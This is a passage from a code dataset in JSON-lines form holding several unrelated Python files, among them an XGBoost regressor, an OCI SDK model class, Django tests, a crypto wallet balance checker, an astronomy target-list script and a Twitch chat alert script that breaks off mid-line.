"usage_type": "name"}, {"api_name": "tipping.TippingModel", "line_number": 46, "usage_type": "name"}, {"api_name": "random.randrange", "line_number": 52, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 54, "usage_type": "call"}, {"api_name": "click.command", "line_number": 29, "usage_type": "call"}, {"api_name": "click.option", "line_number": 30, "usage_type": "call"}]} +{"seq_id": "10652492747", "text": "import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom xgboost.sklearn import XGBRegressor\n\nfrom Utils.Model import get_distribution\nfrom sklearn.model_selection import KFold\nfrom sklearn.metrics import mean_squared_error\n\n\nclass XGBoostRegressionModel() :\n    def __init__( self , name):\n        self.model = XGBRegressor(n_estimators=1000, max_depth=10, learning_rate=0.001, random_state=0)\n\n    def train(self, X,y, label, configs):\n\n        X.reset_index()\n        y.reset_index()\n        distrs = [get_distribution(y)]\n        index = ['Entire set']\n\n        tprs = []\n        aucs = []\n        mean_fpr = np.linspace(0, 1, 10) #CROSS VALIDATION CHANGE\n        plt.figure(figsize=(10, 10))\n\n        outcome_df = pd.DataFrame()\n\n        kf = KFold(n_splits=5)\n\n        for train_index, test_index in kf.split(X) :\n            training_X, testing_X = X.iloc[train_index], X.iloc[test_index]\n            training_y, testing_y = y.iloc[train_index], y.iloc[test_index]\n\n            # Train, predict and Plot\n            self.model.fit(training_X,training_y)\n            #y_pred_rt = self.model.predict_proba(testing_X)[:, 1]\n            y_pred_rt = self.model.predict(testing_X)\n\n            # square root of the MSE, i.e. the RMSE\n            rmse = mean_squared_error(testing_y, y_pred_rt) ** (0.5)\n\n            performance_row = {\n                \"Root Mean Square Error\" : rmse\n            }\n\n            outcome_df = outcome_df.append(performance_row, ignore_index=True)\n            outcome_df.to_csv(\"Outcomes/\"+label+\"RegressionStudent.csv\")\n\n        distr_df = pd.DataFrame(distrs, index=index, columns=[f'Label {l}' for l in range(np.max(y) + 1)])\n        distr_df.to_csv(configs['model']['save_dir'] +\"-K-Fold-Distributions.csv\", 
index=True)\n", "repo_name": "zibrahim/TeacherStudentOutcomePrediction", "sub_path": "Models/XGBoostRegressor/Model.py", "file_name": "Model.py", "file_ext": "py", "file_size_in_byte": 1707, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "xgboost.sklearn.XGBRegressor", "line_number": 13, "usage_type": "call"}, {"api_name": "Utils.Model.get_distribution", "line_number": 19, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 24, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 25, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 25, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 27, "usage_type": "call"}, {"api_name": "sklearn.model_selection.KFold", "line_number": 29, "usage_type": "call"}, {"api_name": "sklearn.metrics.mean_squared_error", "line_number": 40, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 49, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 49, "usage_type": "call"}]} +{"seq_id": "31595877709", "text": "from oci.util import formatted_flat_dict, NONE_SENTINEL, value_allowed_none_or_none_sentinel # noqa: F401\nfrom oci.decorators import init_model_state_from_kwargs\n\n\n@init_model_state_from_kwargs\nclass LogAnalyticsEntityType(object):\n \"\"\"\n Description of log analytics entity type.\n \"\"\"\n\n #: A constant which can be used with the cloud_type property of a LogAnalyticsEntityType.\n #: This constant has a value of \"CLOUD\"\n CLOUD_TYPE_CLOUD = \"CLOUD\"\n\n #: A constant which can be used with the cloud_type property of a LogAnalyticsEntityType.\n #: This constant has a value of \"NON_CLOUD\"\n CLOUD_TYPE_NON_CLOUD = \"NON_CLOUD\"\n\n #: A constant which can be used with the cloud_type property of a LogAnalyticsEntityType.\n #: This constant has a value of \"ALL\"\n CLOUD_TYPE_ALL = \"ALL\"\n\n #: A constant which can be used with the lifecycle_state property of a LogAnalyticsEntityType.\n #: This constant has a value of \"ACTIVE\"\n LIFECYCLE_STATE_ACTIVE = \"ACTIVE\"\n\n #: A constant which can be used with the lifecycle_state property of a LogAnalyticsEntityType.\n #: This constant has a value of \"DELETED\"\n LIFECYCLE_STATE_DELETED = \"DELETED\"\n\n #: A constant which can be used with the management_agent_eligibility_status property of a LogAnalyticsEntityType.\n #: This constant has a value of \"ELIGIBLE\"\n MANAGEMENT_AGENT_ELIGIBILITY_STATUS_ELIGIBLE = \"ELIGIBLE\"\n\n #: A constant which can be used with the management_agent_eligibility_status property of a LogAnalyticsEntityType.\n #: This constant has a value of \"INELIGIBLE\"\n MANAGEMENT_AGENT_ELIGIBILITY_STATUS_INELIGIBLE = \"INELIGIBLE\"\n\n #: A constant which can be used with the management_agent_eligibility_status property of a LogAnalyticsEntityType.\n #: This constant has a value of \"UNKNOWN\"\n MANAGEMENT_AGENT_ELIGIBILITY_STATUS_UNKNOWN = \"UNKNOWN\"\n\n def __init__(self, **kwargs):\n \"\"\"\n Initializes a new LogAnalyticsEntityType object with values from keyword arguments.\n The following keyword arguments are supported (corresponding to the getters/setters of this class):\n\n :param name:\n The value to assign to the name property of this LogAnalyticsEntityType.\n :type name: str\n\n :param internal_name:\n The value to assign to the internal_name property of this LogAnalyticsEntityType.\n :type internal_name: str\n\n :param compartment_id:\n The value to assign to the 
compartment_id property of this LogAnalyticsEntityType.\n :type compartment_id: str\n\n :param category:\n The value to assign to the category property of this LogAnalyticsEntityType.\n :type category: str\n\n :param cloud_type:\n The value to assign to the cloud_type property of this LogAnalyticsEntityType.\n Allowed values for this property are: \"CLOUD\", \"NON_CLOUD\", \"ALL\", 'UNKNOWN_ENUM_VALUE'.\n Any unrecognized values returned by a service will be mapped to 'UNKNOWN_ENUM_VALUE'.\n :type cloud_type: str\n\n :param properties:\n The value to assign to the properties property of this LogAnalyticsEntityType.\n :type properties: list[oci.log_analytics.models.EntityTypeProperty]\n\n :param lifecycle_state:\n The value to assign to the lifecycle_state property of this LogAnalyticsEntityType.\n Allowed values for this property are: \"ACTIVE\", \"DELETED\", 'UNKNOWN_ENUM_VALUE'.\n Any unrecognized values returned by a service will be mapped to 'UNKNOWN_ENUM_VALUE'.\n :type lifecycle_state: str\n\n :param time_created:\n The value to assign to the time_created property of this LogAnalyticsEntityType.\n :type time_created: datetime\n\n :param time_updated:\n The value to assign to the time_updated property of this LogAnalyticsEntityType.\n :type time_updated: datetime\n\n :param management_agent_eligibility_status:\n The value to assign to the management_agent_eligibility_status property of this LogAnalyticsEntityType.\n Allowed values for this property are: \"ELIGIBLE\", \"INELIGIBLE\", \"UNKNOWN\", 'UNKNOWN_ENUM_VALUE'.\n Any unrecognized values returned by a service will be mapped to 'UNKNOWN_ENUM_VALUE'.\n :type management_agent_eligibility_status: str\n\n \"\"\"\n self.swagger_types = {\n 'name': 'str',\n 'internal_name': 'str',\n 'compartment_id': 'str',\n 'category': 'str',\n 'cloud_type': 'str',\n 'properties': 'list[EntityTypeProperty]',\n 'lifecycle_state': 'str',\n 'time_created': 'datetime',\n 'time_updated': 'datetime',\n 'management_agent_eligibility_status': 'str'\n }\n\n self.attribute_map = {\n 'name': 'name',\n 'internal_name': 'internalName',\n 'compartment_id': 'compartmentId',\n 'category': 'category',\n 'cloud_type': 'cloudType',\n 'properties': 'properties',\n 'lifecycle_state': 'lifecycleState',\n 'time_created': 'timeCreated',\n 'time_updated': 'timeUpdated',\n 'management_agent_eligibility_status': 'managementAgentEligibilityStatus'\n }\n\n self._name = None\n self._internal_name = None\n self._compartment_id = None\n self._category = None\n self._cloud_type = None\n self._properties = None\n self._lifecycle_state = None\n self._time_created = None\n self._time_updated = None\n self._management_agent_eligibility_status = None\n\n @property\n def name(self):\n \"\"\"\n **[Required]** Gets the name of this LogAnalyticsEntityType.\n Log analytics entity type name.\n\n\n :return: The name of this LogAnalyticsEntityType.\n :rtype: str\n \"\"\"\n return self._name\n\n @name.setter\n def name(self, name):\n \"\"\"\n Sets the name of this LogAnalyticsEntityType.\n Log analytics entity type name.\n\n\n :param name: The name of this LogAnalyticsEntityType.\n :type: str\n \"\"\"\n self._name = name\n\n @property\n def internal_name(self):\n \"\"\"\n **[Required]** Gets the internal_name of this LogAnalyticsEntityType.\n Internal name for the log analytics entity type.\n\n\n :return: The internal_name of this LogAnalyticsEntityType.\n :rtype: str\n \"\"\"\n return self._internal_name\n\n @internal_name.setter\n def internal_name(self, internal_name):\n \"\"\"\n Sets the 
internal_name of this LogAnalyticsEntityType.\n        Internal name for the log analytics entity type.\n\n\n        :param internal_name: The internal_name of this LogAnalyticsEntityType.\n        :type: str\n        \"\"\"\n        self._internal_name = internal_name\n\n    @property\n    def compartment_id(self):\n        \"\"\"\n        Gets the compartment_id of this LogAnalyticsEntityType.\n        Compartment Identifier `OCID`__.\n\n        __ https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm\n\n\n        :return: The compartment_id of this LogAnalyticsEntityType.\n        :rtype: str\n        \"\"\"\n        return self._compartment_id\n\n    @compartment_id.setter\n    def compartment_id(self, compartment_id):\n        \"\"\"\n        Sets the compartment_id of this LogAnalyticsEntityType.\n        Compartment Identifier `OCID`__.\n\n        __ https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm\n\n\n        :param compartment_id: The compartment_id of this LogAnalyticsEntityType.\n        :type: str\n        \"\"\"\n        self._compartment_id = compartment_id\n\n    @property\n    def category(self):\n        \"\"\"\n        **[Required]** Gets the category of this LogAnalyticsEntityType.\n        Log analytics entity type category. Category will be used for grouping and filtering.\n\n\n        :return: The category of this LogAnalyticsEntityType.\n        :rtype: str\n        \"\"\"\n        return self._category\n\n    @category.setter\n    def category(self, category):\n        \"\"\"\n        Sets the category of this LogAnalyticsEntityType.\n        Log analytics entity type category. Category will be used for grouping and filtering.\n\n\n        :param category: The category of this LogAnalyticsEntityType.\n        :type: str\n        \"\"\"\n        self._category = category\n\n    @property\n    def cloud_type(self):\n        \"\"\"\n        **[Required]** Gets the cloud_type of this LogAnalyticsEntityType.\n        Log analytics entity type group. That can be CLOUD (OCI) or NON_CLOUD otherwise.\n\n        Allowed values for this property are: \"CLOUD\", \"NON_CLOUD\", \"ALL\", 'UNKNOWN_ENUM_VALUE'.\n        Any unrecognized values returned by a service will be mapped to 'UNKNOWN_ENUM_VALUE'.\n\n\n        :return: The cloud_type of this LogAnalyticsEntityType.\n        :rtype: str\n        \"\"\"\n        return self._cloud_type\n\n    @cloud_type.setter\n    def cloud_type(self, cloud_type):\n        \"\"\"\n        Sets the cloud_type of this LogAnalyticsEntityType.\n        Log analytics entity type group. 
That can be CLOUD (OCI) or NON_CLOUD otherwise.\n\n\n :param cloud_type: The cloud_type of this LogAnalyticsEntityType.\n :type: str\n \"\"\"\n allowed_values = [\"CLOUD\", \"NON_CLOUD\", \"ALL\"]\n if not value_allowed_none_or_none_sentinel(cloud_type, allowed_values):\n cloud_type = 'UNKNOWN_ENUM_VALUE'\n self._cloud_type = cloud_type\n\n @property\n def properties(self):\n \"\"\"\n Gets the properties of this LogAnalyticsEntityType.\n The parameters used in file patterns specified in log sources for this log analytics entity type.\n\n\n :return: The properties of this LogAnalyticsEntityType.\n :rtype: list[oci.log_analytics.models.EntityTypeProperty]\n \"\"\"\n return self._properties\n\n @properties.setter\n def properties(self, properties):\n \"\"\"\n Sets the properties of this LogAnalyticsEntityType.\n The parameters used in file patterns specified in log sources for this log analytics entity type.\n\n\n :param properties: The properties of this LogAnalyticsEntityType.\n :type: list[oci.log_analytics.models.EntityTypeProperty]\n \"\"\"\n self._properties = properties\n\n @property\n def lifecycle_state(self):\n \"\"\"\n **[Required]** Gets the lifecycle_state of this LogAnalyticsEntityType.\n The current lifecycle state of the log analytics entity.\n\n Allowed values for this property are: \"ACTIVE\", \"DELETED\", 'UNKNOWN_ENUM_VALUE'.\n Any unrecognized values returned by a service will be mapped to 'UNKNOWN_ENUM_VALUE'.\n\n\n :return: The lifecycle_state of this LogAnalyticsEntityType.\n :rtype: str\n \"\"\"\n return self._lifecycle_state\n\n @lifecycle_state.setter\n def lifecycle_state(self, lifecycle_state):\n \"\"\"\n Sets the lifecycle_state of this LogAnalyticsEntityType.\n The current lifecycle state of the log analytics entity.\n\n\n :param lifecycle_state: The lifecycle_state of this LogAnalyticsEntityType.\n :type: str\n \"\"\"\n allowed_values = [\"ACTIVE\", \"DELETED\"]\n if not value_allowed_none_or_none_sentinel(lifecycle_state, allowed_values):\n lifecycle_state = 'UNKNOWN_ENUM_VALUE'\n self._lifecycle_state = lifecycle_state\n\n @property\n def time_created(self):\n \"\"\"\n **[Required]** Gets the time_created of this LogAnalyticsEntityType.\n Time the log analytics entity type was created. An RFC3339 formatted datetime string.\n\n\n :return: The time_created of this LogAnalyticsEntityType.\n :rtype: datetime\n \"\"\"\n return self._time_created\n\n @time_created.setter\n def time_created(self, time_created):\n \"\"\"\n Sets the time_created of this LogAnalyticsEntityType.\n Time the log analytics entity type was created. An RFC3339 formatted datetime string.\n\n\n :param time_created: The time_created of this LogAnalyticsEntityType.\n :type: datetime\n \"\"\"\n self._time_created = time_created\n\n @property\n def time_updated(self):\n \"\"\"\n **[Required]** Gets the time_updated of this LogAnalyticsEntityType.\n Time the log analytics entity type was updated. An RFC3339 formatted datetime string.\n\n\n :return: The time_updated of this LogAnalyticsEntityType.\n :rtype: datetime\n \"\"\"\n return self._time_updated\n\n @time_updated.setter\n def time_updated(self, time_updated):\n \"\"\"\n Sets the time_updated of this LogAnalyticsEntityType.\n Time the log analytics entity type was updated. 
An RFC3339 formatted datetime string.\n\n\n        :param time_updated: The time_updated of this LogAnalyticsEntityType.\n        :type: datetime\n        \"\"\"\n        self._time_updated = time_updated\n\n    @property\n    def management_agent_eligibility_status(self):\n        \"\"\"\n        Gets the management_agent_eligibility_status of this LogAnalyticsEntityType.\n        This field indicates whether logs for entities of this type can be collected using a management agent.\n\n        Allowed values for this property are: \"ELIGIBLE\", \"INELIGIBLE\", \"UNKNOWN\", 'UNKNOWN_ENUM_VALUE'.\n        Any unrecognized values returned by a service will be mapped to 'UNKNOWN_ENUM_VALUE'.\n\n\n        :return: The management_agent_eligibility_status of this LogAnalyticsEntityType.\n        :rtype: str\n        \"\"\"\n        return self._management_agent_eligibility_status\n\n    @management_agent_eligibility_status.setter\n    def management_agent_eligibility_status(self, management_agent_eligibility_status):\n        \"\"\"\n        Sets the management_agent_eligibility_status of this LogAnalyticsEntityType.\n        This field indicates whether logs for entities of this type can be collected using a management agent.\n\n\n        :param management_agent_eligibility_status: The management_agent_eligibility_status of this LogAnalyticsEntityType.\n        :type: str\n        \"\"\"\n        allowed_values = [\"ELIGIBLE\", \"INELIGIBLE\", \"UNKNOWN\"]\n        if not value_allowed_none_or_none_sentinel(management_agent_eligibility_status, allowed_values):\n            management_agent_eligibility_status = 'UNKNOWN_ENUM_VALUE'\n        self._management_agent_eligibility_status = management_agent_eligibility_status\n\n    def __repr__(self):\n        return formatted_flat_dict(self)\n\n    def __eq__(self, other):\n        if other is None:\n            return False\n\n        return self.__dict__ == other.__dict__\n\n    def __ne__(self, other):\n        return not self == other\n", "repo_name": "oracle/oci-python-sdk", "sub_path": "src/oci/log_analytics/models/log_analytics_entity_type.py", "file_name": "log_analytics_entity_type.py", "file_ext": "py", "file_size_in_byte": 14688, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 345, "dataset": "github-code", "pt": "52", "api": [{"api_name": "oci.util.value_allowed_none_or_none_sentinel", "line_number": 258, "usage_type": "call"}, {"api_name": "oci.util.value_allowed_none_or_none_sentinel", "line_number": 312, "usage_type": "call"}, {"api_name": "oci.util.value_allowed_none_or_none_sentinel", "line_number": 390, "usage_type": "call"}, {"api_name": "oci.util.formatted_flat_dict", "line_number": 395, "usage_type": "call"}, {"api_name": "oci.decorators.init_model_state_from_kwargs", "line_number": 5, "usage_type": "name"}]} +{"seq_id": "33549468774", "text": "from dataclasses import dataclass\nfrom typing import Any, Optional\n\n\n@dataclass\nclass TreeNode:\n    val: Any\n    left: Optional[\"TreeNode\"] = None\n    right: Optional[\"TreeNode\"] = None\n    parent: Optional[\"TreeNode\"] = None\n\n\ndef get_successor_node(node: TreeNode):\n    \"\"\"Get the successor of the given node, i.e. the node that follows it in an in-order traversal\"\"\"\n    # If the node has a right child, the successor is the leftmost node of its right subtree\n    if node.right:\n        n1 = node.right\n        while n1.left:\n            n1 = n1.left\n        return n1\n    # Otherwise, if the node is the left child of its parent, the successor is the parent\n    elif node.parent and node is node.parent.left:\n        return node.parent\n    else:\n        # Neither a left child nor the owner of a right subtree: the node is the rightmost\n        # node of some subtree, so climb until that subtree is left from a left child\n        parent = node.parent\n        while parent and parent.right is node:\n            node = parent\n            parent = parent.parent\n        return parent\n", "repo_name": "LCW-QAQ/algorithme", "sub_path": "src/tree/tree_successor.py", "file_name": "tree_successor.py", "file_ext": "py", "file_size_in_byte": 960, "program_lang": "python", "lang": "en", "doc_type": 
"code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "typing.Any", "line_number": 7, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 8, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 9, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 10, "usage_type": "name"}, {"api_name": "dataclasses.dataclass", "line_number": 5, "usage_type": "name"}]} +{"seq_id": "38773588571", "text": "import time\nimport json\nfrom os import path\nfrom getpass import getuser\nfrom platform import node\n\nVERSION = (16, 6, 4)\nAPPNAME = 'tsdesktop'\n\nbuildinfo = {\n 'TIME': None,\n}\nbinfoFile = path.join(path.dirname(__file__), 'buildinfo.json')\n\ndef writeBuildInfo():\n global buildinfo\n buildinfo['TIME'] = time.time()\n buildinfo['AUTHOR'] = getuser()\n buildinfo['HOSTNAME'] = node()\n with open(binfoFile, 'w') as fh:\n json.dump(buildinfo, fh)\n fh.close()\n\ndef readBuildInfo():\n global buildinfo\n try:\n with open(binfoFile, 'r') as fh:\n buildinfo = json.load(fh)\n fh.close()\n except IOError: # coverage: exclude\n pass\n\ndef _version():\n return '.'.join([str(i) for i in VERSION])\n\ndef string():\n readBuildInfo()\n v = \"{} v{}\".format(APPNAME, _version())\n if buildinfo['TIME'] is not None:\n v = \"{} ({} {}@{})\".format(\n v,\n time.strftime('%d%b%Y', time.localtime(buildinfo['TIME'])),\n buildinfo['AUTHOR'],\n buildinfo['HOSTNAME'],\n )\n return v\n\ndef println():\n print(string())\n\nif __name__ == '__main__': # coverage: exclude\n println()\n", "repo_name": "tsadm/desktop", "sub_path": "lib/tsdesktop/version.py", "file_name": "version.py", "file_ext": "py", "file_size_in_byte": 1182, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "os.path.join", "line_number": 13, "usage_type": "call"}, {"api_name": "os.path", "line_number": 13, "usage_type": "name"}, {"api_name": "os.path.dirname", "line_number": 13, "usage_type": "call"}, {"api_name": "time.time", "line_number": 17, "usage_type": "call"}, {"api_name": "getpass.getuser", "line_number": 18, "usage_type": "call"}, {"api_name": "platform.node", "line_number": 19, "usage_type": "call"}, {"api_name": "json.dump", "line_number": 21, "usage_type": "call"}, {"api_name": "json.load", "line_number": 28, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 42, "usage_type": "call"}, {"api_name": "time.localtime", "line_number": 42, "usage_type": "call"}]} +{"seq_id": "14336307957", "text": "from django.contrib.auth.models import User\nfrom django.core.urlresolvers import reverse\nfrom django.template.defaultfilters import slugify\nfrom django.test import TestCase\n\nfrom ..models import Post\n\n\nclass BlogTests(TestCase):\n\n def setUp(self):\n self.user = User.objects.create(username='test')\n\n def create_post(self, title='Test Blog Post', published=True):\n return Post.objects.create(\n title=title,\n author=self.user,\n published=published\n )\n\n def test_model_creation(self):\n post = self.create_post()\n self.assertTrue(isinstance(post, Post))\n self.assertEqual(post.__unicode__(), post.title)\n self.assertEqual(post.slug, slugify(post.title))\n\n def test_model_url(self):\n post = self.create_post()\n self.assertEqual(post.get_absolute_url(),\n reverse('blog:detail', kwargs={'slug': post.slug}))\n\n def test_model_manager(self):\n live_post = self.create_post()\n draft_post = self.create_post(title='Draft Post',\n published=False)\n self.assertIn(live_post, 
Post.objects.live())\n self.assertNotIn(draft_post, Post.objects.live())\n\n def test_custom_slug(self):\n post = Post.objects.create(\n title='A Post with a Custom Slug',\n slug='fizzbuzz',\n author=self.user\n )\n self.assertNotEqual(post.slug, slugify(post.title))\n self.assertEqual(post.slug, 'fizzbuzz')\n", "repo_name": "kennethlove/Getting-Started-With-Django", "sub_path": "blog/tests/test_models.py", "file_name": "test_models.py", "file_ext": "py", "file_size_in_byte": 1485, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 46, "dataset": "github-code", "pt": "52", "api": [{"api_name": "django.test.TestCase", "line_number": 9, "usage_type": "name"}, {"api_name": "django.contrib.auth.models.User.objects.create", "line_number": 12, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.User.objects", "line_number": 12, "usage_type": "attribute"}, {"api_name": "django.contrib.auth.models.User", "line_number": 12, "usage_type": "name"}, {"api_name": "models.Post.objects.create", "line_number": 15, "usage_type": "call"}, {"api_name": "models.Post.objects", "line_number": 15, "usage_type": "attribute"}, {"api_name": "models.Post", "line_number": 15, "usage_type": "name"}, {"api_name": "models.Post", "line_number": 23, "usage_type": "argument"}, {"api_name": "django.template.defaultfilters.slugify", "line_number": 25, "usage_type": "call"}, {"api_name": "django.core.urlresolvers.reverse", "line_number": 30, "usage_type": "call"}, {"api_name": "models.Post.objects.live", "line_number": 36, "usage_type": "call"}, {"api_name": "models.Post.objects", "line_number": 36, "usage_type": "attribute"}, {"api_name": "models.Post", "line_number": 36, "usage_type": "name"}, {"api_name": "models.Post.objects.live", "line_number": 37, "usage_type": "call"}, {"api_name": "models.Post.objects", "line_number": 37, "usage_type": "attribute"}, {"api_name": "models.Post", "line_number": 37, "usage_type": "name"}, {"api_name": "models.Post.objects.create", "line_number": 40, "usage_type": "call"}, {"api_name": "models.Post.objects", "line_number": 40, "usage_type": "attribute"}, {"api_name": "models.Post", "line_number": 40, "usage_type": "name"}, {"api_name": "django.template.defaultfilters.slugify", "line_number": 45, "usage_type": "call"}]} +{"seq_id": "1160453927", "text": "from pycoingecko import CoinGeckoAPI\nfrom traceback import print_exc\n\ncg = CoinGeckoAPI()\n\ndef crypto_balance(address: str, id: str, currency: str, web3_provider):\n \"\"\"\n Returns the native coin balance (ETH or BNB) of the given wallet, priced in the target currency\n\n address: metamask wallet address\n id: coingecko coin's id\n currency: coingecko currency code, e.g. 'brl' or 'usd'\n web3_provider: a connected web3.Web3 instance (Infura for ETH, a BSC node for BNB)\n \"\"\"\n try:\n address = web3_provider.toChecksumAddress(address)\n coin = web3_provider.eth.getBalance(address.strip())\n qtd = float(web3_provider.fromWei(coin, \"ether\").to_eng_string())\n price = cg.get_price(ids=id, vs_currencies=currency)[id][currency]\n balance = qtd * price\n except Exception as e:\n print(\"The following error occurred:\\n\")\n print(e.__class__.__name__)\n print_exc()\n return \"\"\n\n return balance\n\n\ndef token_balance(\n address: str, contract: str, abi: str, id: str, currency: str, web3_provider\n):\n \"\"\"\n Returns any token balance based on its contract address and ABI\n\n address: metamask wallet address\n contract: token contract address\n id: coingecko coin's id\n currency: coingecko currency code, e.g. 'brl' or 'usd'\n web3_provider: a connected web3.Web3 instance (Infura for ETH, a BSC node for BNB)\n \"\"\"\n try:\n token_address = web3_provider.toChecksumAddress(contract)\n wallet_address = 
web3_provider.toChecksumAddress(address)\n token = web3_provider.eth.contract(address=token_address, abi=abi)\n token_balance = token.functions.balanceOf(wallet_address).call()\n qtd = float(web3_provider.fromWei(token_balance, \"ether\").to_eng_string())\n price = cg.get_price(ids=id, vs_currencies=currency)[id][currency]\n balance = qtd * price\n except Exception as e:\n print(\"The following error occurred:\\n\")\n print(e.__class__.__name__)\n print_exc()\n return \"\"\n\n return balance\n", "repo_name": "Hidra-Tech/smallFish", "sub_path": "check_wallet.py", "file_name": "check_wallet.py", "file_ext": "py", "file_size_in_byte": 1820, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "pycoingecko.CoinGeckoAPI", "line_number": 4, "usage_type": "call"}, {"api_name": "traceback.print_exc", "line_number": 24, "usage_type": "call"}, {"api_name": "traceback.print_exc", "line_number": 53, "usage_type": "call"}]} +{"seq_id": "5628847721", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Nov 29 04:44:52 2022\n\n@author: porri\n\"\"\"\n\n\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom astropy.coordinates import SkyCoord\nimport astropy.units as u\nfrom copy import deepcopy\nimport os\nfrom utilly import *\nimport requests\n\npackage_directory = os.path.dirname(os.path.abspath(__file__)) + '/'\n\ndef get_target_list():\n # call = 'wget \"https://docs.google.com/spreadsheets/d/1JPIAXjcy-maVeNMkImRHFnhfoo2ulJQzHkCJOL0AbKs/export?format=csv&gid=0\" -O \"{}debass.csv\"'.format(package_directory)\n\n #os.system(call)\n URL = \"https://docs.google.com/spreadsheets/d/1JPIAXjcy-maVeNMkImRHFnhfoo2ulJQzHkCJOL0AbKs/export?format=csv&gid=0\"\n \n test = requests.get(URL)\n open('debass.csv', 'wb').write(test.content)\n\n df = pd.read_csv('debass.csv')\n follow_ind = df['Following?'].values == 'YES'\n df = df.iloc[follow_ind]\n\n # call = 'rm -rf {}debass.csv'.format(package_directory)\n # os.system(call)\n return df\n\n\ndef make_debass_entries(debass,exptime=300,readout=40,filters=['R','V']):\n obs = []\n for j in range(len(debass)):\n l = debass.iloc[j]\n repeats = 1\n ra = l.RA\n dec = l.DEC\n name = l['snid'] + '_22S05'\n priority = l['priority']\n for f in filters:\n ob = make_obs_entry(exptime,f,repeats,name,ra,dec,propid='2022S-05',priority=priority)\n obs += [ob]\n return obs \n \n\ndef debas_priority(debass,names=None):\n \n debass['priority'] = int(2)\n\n if names is not None:\n for i in range(len(names)):\n name = names[i]\n for j in range(len(debass)):\n if name[0] in debass.iloc[j]['Target Name']:\n debass['priority'].iloc[j] = int(name[1])\n\n return debass\n\n\ndef make_debass_list(name_priority=None):\n date = get_today()\n\n save_path = package_directory + 'targets/' + date\n\n make_dir(save_path)\n\n df = get_target_list()\n df = debas_priority(df,names = name_priority)\n debass = make_debass_entries(df)\n save_targs(debass,save_path + '/debass.json')\n print('!!! 
Made DEBASS target list for ' + date + ' !!!')\n\n\nif __name__ == '__main__':\n make_debass_list()", "repo_name": "CheerfulUser/otehiwai_po", "sub_path": "otehiwai_po/debass_targets.py", "file_name": "debass_targets.py", "file_ext": "py", "file_size_in_byte": 2236, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "os.path.dirname", "line_number": 19, "usage_type": "call"}, {"api_name": "os.path", "line_number": 19, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 19, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 27, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 30, "usage_type": "call"}]} +{"seq_id": "20945048849", "text": "from django.urls import path\n\nfrom . import views\n\napp_name = 'students'\n\nurlpatterns = [\n path('', views.SearchPINView.as_view(), name='search_pin'),\n path('tutorial/', views.StudentTutorial.as_view(), name='tutorial'),\n path('prova/<str:pin>/', views.ExamView.as_view(), name='exam'),\n path('prova/<str:pin>/<str:question>',\n views.QuestionView.as_view(), name='question'),\n path('enunciado/<str:question>/<path:path>/',\n views.pdf_view, name='statement')\n]\n", "repo_name": "Robertoskb/CodeScore", "sub_path": "students/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 491, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "django.urls.path", "line_number": 8, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 9, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 10, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 11, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 13, "usage_type": "call"}]} +{"seq_id": "30009638514", "text": "import connect\nimport asyncio\nfrom json import loads\n\nprint('ISEDOL CHAT ALERT START')\n\n# Connect Telegram\nTG = connect.ConnectTG(\"private\") # Input \"private\" or \"public\"\nbot = TG.bot\n\n# Channels\ntrack = (\"vo_ine\", \"jingburger\", \"lilpaaaaaa\", \"cotton__123\", \"gosegugosegu\", \"viichan6\", \"woowakgood\", \"chunyangkr\", \"111roentgenium\")\nisedol_id = (\"vo_ine\", \"jingburger\", \"lilpaaaaaa\", \"cotton__123\", \"gosegugosegu\", \"viichan6\", \"woowakgood\")\nisedol_kr = {\"vo_ine\":\"아이네 ⚪️\", \"jingburger\":\"징버거 🟡\", \"lilpaaaaaa\":\"릴파 🔵\", \"cotton__123\":\"주르르 🟣\"\n , \"gosegugosegu\":\"고세구 🦠\", \"viichan6\":\"비챤 🟢\", \"woowakgood\":\"우왁굳 🐵\", \"chunyangkr\":\"천양 🐡\", \"111roentgenium\":\"뢴트게늄 ☢\"}\n\nasync def run(ID):\n SERVER = \"irc.twitch.tv\"\n PORT = 6667\n IRCread: asyncio.StreamReader\n IRCwrite: asyncio.StreamWriter\n PASSWORD = connect.twAPIAutho.OAuth # This needs to be an OAuth token\n USERNAME = ID # Connect This Channel ID\n CHANNEL = USERNAME\n Connecting = True\n IRCread, IRCwrite = await asyncio.open_connection(SERVER, PORT)\n IRCwrite.write(\n (\n \"PASS \" + PASSWORD + \"\\n\" +\n \"NICK \" + USERNAME + \"\\n\" +\n \"JOIN #\" + 